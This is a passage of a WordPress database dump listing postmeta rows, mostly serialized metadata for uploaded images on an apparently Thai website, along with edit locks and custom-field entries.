(1109,359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2024/09/457381847_122174879558202781_6672815312348190309_n-1.jpg\";s:8:\"filesize\";i:798828;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"457381847_122174879558202781_6672815312348190309_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28102;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"457381847_122174879558202781_6672815312348190309_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223486;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"457381847_122174879558202781_6672815312348190309_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"457381847_122174879558202781_6672815312348190309_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:234041;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"457381847_122174879558202781_6672815312348190309_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:397531;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"457381847_122174879558202781_6672815312348190309_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1112,358,'_thumbnail_id','359'),
(1113,358,'_edit_last','2'),
(1116,358,'title_style','default'),
(1117,358,'_title_style','field_5d1a0217cf408'),
(1118,358,'related',''),
(1119,358,'_related','field_603b51c3e183e'),
(1120,360,'title_style','default'),
(1121,360,'_title_style','field_5d1a0217cf408'),
(1122,360,'related',''),
(1123,360,'_related','field_603b51c3e183e'),
(1124,3,'_edit_lock','1730805232:1'),
(1125,361,'title_style','default'),
(1126,361,'_title_style','field_5d1a0217cf408'),
(1127,362,'title_style','default'),
(1128,362,'_title_style','field_5d1a0217cf408'),
(1131,367,'_edit_lock','1726123630:2'),
(1133,368,'_wp_attached_file','2024/09/458225254_122175360044202781_5522903753949252187_n.jpg'),
(1134,368,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\";s:8:\"filesize\";i:317022;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"458225254_122175360044202781_5522903753949252187_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22080;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"458225254_122175360044202781_5522903753949252187_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169310;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"458225254_122175360044202781_5522903753949252187_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8866;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"458225254_122175360044202781_5522903753949252187_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105707;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"458225254_122175360044202781_5522903753949252187_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:301680;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"458225254_122175360044202781_5522903753949252187_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23507;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1135,367,'_generateblocks_dynamic_css_version','1.9.1'),
(1138,367,'_thumbnail_id','368'),
(1139,367,'_edit_last','2'),
(1141,367,'title_style','default'),
(1142,367,'_title_style','field_5d1a0217cf408'),
(1143,369,'title_style','default'),
(1144,369,'_title_style','field_5d1a0217cf408'),
(1150,367,'related',''),
(1151,367,'_related','field_603b51c3e183e'),
(1152,370,'title_style','default'),
(1153,370,'_title_style','field_5d1a0217cf408'),
(1154,370,'related',''),
(1155,370,'_related','field_603b51c3e183e'),
(1157,371,'title_style','default'),
(1158,371,'_title_style','field_5d1a0217cf408'),
(1159,371,'related',''),
(1160,371,'_related','field_603b51c3e183e'),
(1162,373,'_wp_attached_file','2024/09/458199408_122175360092202781_7097423784924703217_n.jpg'),
(1163,373,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/09/458199408_122175360092202781_7097423784924703217_n.jpg\";s:8:\"filesize\";i:340598;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"458199408_122175360092202781_7097423784924703217_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29896;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194330;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"458199408_122175360092202781_7097423784924703217_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12184;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"458199408_122175360092202781_7097423784924703217_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127658;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"458199408_122175360092202781_7097423784924703217_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:335265;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"458199408_122175360092202781_7097423784924703217_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29664;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1167,374,'title_style','default'),
(1168,374,'_title_style','field_5d1a0217cf408'),
(1169,374,'related',''),
(1170,374,'_related','field_603b51c3e183e'),
(1174,376,'title_style','default'),
(1175,376,'_title_style','field_5d1a0217cf408'),
(1176,376,'related',''),
(1177,376,'_related','field_603b51c3e183e'),
(1181,378,'title_style','default'),
(1182,378,'_title_style','field_5d1a0217cf408'),
(1183,378,'related',''),
(1184,378,'_related','field_603b51c3e183e'),
(1187,379,'title_style','default'),
(1188,379,'_title_style','field_5d1a0217cf408'),
(1189,379,'related',''),
(1190,379,'_related','field_603b51c3e183e'),
(1194,381,'title_style','default'),
(1195,381,'_title_style','field_5d1a0217cf408'),
(1196,381,'related',''),
(1197,381,'_related','field_603b51c3e183e'),
(1199,383,'_wp_attached_file','2024/09/458252036_122175357182202781_526320192492554342_n.jpg'),
(1200,383,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:61:\"2024/09/458252036_122175357182202781_526320192492554342_n.jpg\";s:8:\"filesize\";i:339605;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"458252036_122175357182202781_526320192492554342_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27458;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"458252036_122175357182202781_526320192492554342_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:188226;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"458252036_122175357182202781_526320192492554342_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11351;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"458252036_122175357182202781_526320192492554342_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121239;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"458252036_122175357182202781_526320192492554342_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:329156;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"458252036_122175357182202781_526320192492554342_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27226;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1201,384,'_wp_attached_file','2024/09/458290652_122175359900202781_4995696793881930390_n.jpg'),
(1202,384,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/09/458290652_122175359900202781_4995696793881930390_n.jpg\";s:8:\"filesize\";i:413043;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"458290652_122175359900202781_4995696793881930390_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26319;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"458290652_122175359900202781_4995696793881930390_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216665;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"458290652_122175359900202781_4995696793881930390_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10508;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"458290652_122175359900202781_4995696793881930390_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133334;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"458290652_122175359900202781_4995696793881930390_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:388235;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"458290652_122175359900202781_4995696793881930390_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28833;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1205,385,'title_style','default'),
(1206,385,'_title_style','field_5d1a0217cf408'),
(1207,385,'related',''),
(1208,385,'_related','field_603b51c3e183e'),
(1212,387,'title_style','default'),
(1213,387,'_title_style','field_5d1a0217cf408'),
(1214,387,'related',''),
(1215,387,'_related','field_603b51c3e183e'),
(1216,388,'_edit_lock','1726123981:2'),
(1217,389,'_wp_attached_file','2024/09/458265014_122175356336202781_4190648388646234065_n.jpg'),
(1218,389,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/09/458265014_122175356336202781_4190648388646234065_n.jpg\";s:8:\"filesize\";i:417217;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"458265014_122175356336202781_4190648388646234065_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26032;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"458265014_122175356336202781_4190648388646234065_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221067;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"458265014_122175356336202781_4190648388646234065_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10389;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"458265014_122175356336202781_4190648388646234065_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231560;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"458265014_122175356336202781_4190648388646234065_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:385791;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"458265014_122175356336202781_4190648388646234065_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28728;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1221,388,'_generateblocks_dynamic_css_version','1.9.1'),
(1222,388,'_edit_last','2'),
(1225,388,'title_style','default'),
(1226,388,'_title_style','field_5d1a0217cf408'),
(1227,388,'related',''),
(1228,388,'_related','field_603b51c3e183e'),
(1229,390,'title_style','default'),
(1230,390,'_title_style','field_5d1a0217cf408'),
(1231,390,'related',''),
(1232,390,'_related','field_603b51c3e183e'),
(1234,388,'_thumbnail_id','389'),
(1244,393,'title_style','default'),
(1245,393,'_title_style','field_5d1a0217cf408'),
(1247,397,'_wp_attached_file','2024/09/นางรำไพ-อดทน-12.5x16-cm.png'),
(1248,397,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1890;s:4:\"file\";s:57:\"2024/09/นางรำไพ-อดทน-12.5x16-cm.png\";s:8:\"filesize\";i:1956511;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:57:\"นางรำไพ-อดทน-12.5x16-cm-234x300.png\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84109;}s:5:\"large\";a:5:{s:4:\"file\";s:58:\"นางรำไพ-อดทน-12.5x16-cm-800x1024.png\";s:5:\"width\";i:800;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:717841;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:57:\"นางรำไพ-อดทน-12.5x16-cm-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36803;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:57:\"นางรำไพ-อดทน-12.5x16-cm-768x983.png\";s:5:\"width\";i:768;s:6:\"height\";i:983;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:670270;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:59:\"นางรำไพ-อดทน-12.5x16-cm-1200x1536.png\";s:5:\"width\";i:1200;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1404249;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:57:\"นางรำไพ-อดทน-12.5x16-cm-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1249,398,'title_style','default'),
(1250,398,'_title_style','field_5d1a0217cf408'),
(1252,400,'_wp_attached_file','2024/09/รองผู้อำนวยการ2.jpg'),
(1253,400,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:591;s:6:\"height\";i:1005;s:4:\"file\";s:55:\"2024/09/รองผู้อำนวยการ2.jpg\";s:8:\"filesize\";i:107490;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ2-176x300.jpg\";s:5:\"width\";i:176;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14372;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6830;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11503;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1254,401,'_wp_attached_file','2024/09/รองผู้อำนวยการ3.jpg'),
(1255,401,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:589;s:6:\"height\";i:650;s:4:\"file\";s:55:\"2024/09/รองผู้อำนวยการ3.jpg\";s:8:\"filesize\";i:107965;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ3-272x300.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17863;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7590;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12637;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1256,402,'title_style','default'),
(1257,402,'_title_style','field_5d1a0217cf408'),
(1259,404,'_wp_attached_file','2024/09/รองผู้อำนวยการ2-1.jpg'),
(1260,404,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:589;s:6:\"height\";i:642;s:4:\"file\";s:57:\"2024/09/รองผู้อำนวยการ2-1.jpg\";s:8:\"filesize\";i:98850;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:57:\"รองผู้อำนวยการ2-1-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17519;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:57:\"รองผู้อำนวยการ2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7201;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:57:\"รองผู้อำนวยการ2-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11138;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1261,405,'title_style','default'),
(1262,405,'_title_style','field_5d1a0217cf408'),
(1263,406,'_wp_attached_file','2024/09/รองผู้อำนวยการ1.jpg'),
(1264,406,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:586;s:6:\"height\";i:639;s:4:\"file\";s:55:\"2024/09/รองผู้อำนวยการ1.jpg\";s:8:\"filesize\";i:106366;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ1-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18699;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7553;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"รองผู้อำนวยการ1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13609;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1265,407,'title_style','default'),
(1266,407,'_title_style','field_5d1a0217cf408'),
(1268,409,'title_style','default'),
(1269,409,'_title_style','field_5d1a0217cf408'),
(1271,411,'_wp_attached_file','2024/09/458199408_122175360092202781_7097423784924703217_n-1.jpg'),
(1272,411,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:64:\"2024/09/458199408_122175360092202781_7097423784924703217_n-1.jpg\";s:8:\"filesize\";i:340598;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"458199408_122175360092202781_7097423784924703217_n-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29896;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"458199408_122175360092202781_7097423784924703217_n-1-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194330;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"458199408_122175360092202781_7097423784924703217_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12184;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"458199408_122175360092202781_7097423784924703217_n-1-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127658;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"458199408_122175360092202781_7097423784924703217_n-1-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:335265;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"458199408_122175360092202781_7097423784924703217_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29664;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1273,412,'title_style','default'),
(1274,412,'_title_style','field_5d1a0217cf408'),
(1276,414,'title_style','default'),
(1277,414,'_title_style','field_5d1a0217cf408'),
(1279,416,'title_style','default'),
(1280,416,'_title_style','field_5d1a0217cf408'),
(1281,417,'title_style','default'),
(1282,417,'_title_style','field_5d1a0217cf408'),
(1283,418,'_wp_attached_file','2024/09/e24fdb867221495643d16cf69a56df03.jpg'),
